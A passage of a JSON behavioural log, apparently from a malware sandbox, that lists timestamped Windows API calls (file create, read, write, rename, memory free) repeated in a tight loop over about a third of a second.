17:41:40,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,400", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,410", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,420", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,450", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,450", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,460", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,470", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,490", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,500", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,510", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,510", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,520", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,530", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,540", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,550", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,550", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,560", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,570", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,580", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,601", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,611", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,621", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,631", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,641", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,651", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,661", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,661", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,691", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,701", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,721", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,721", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": 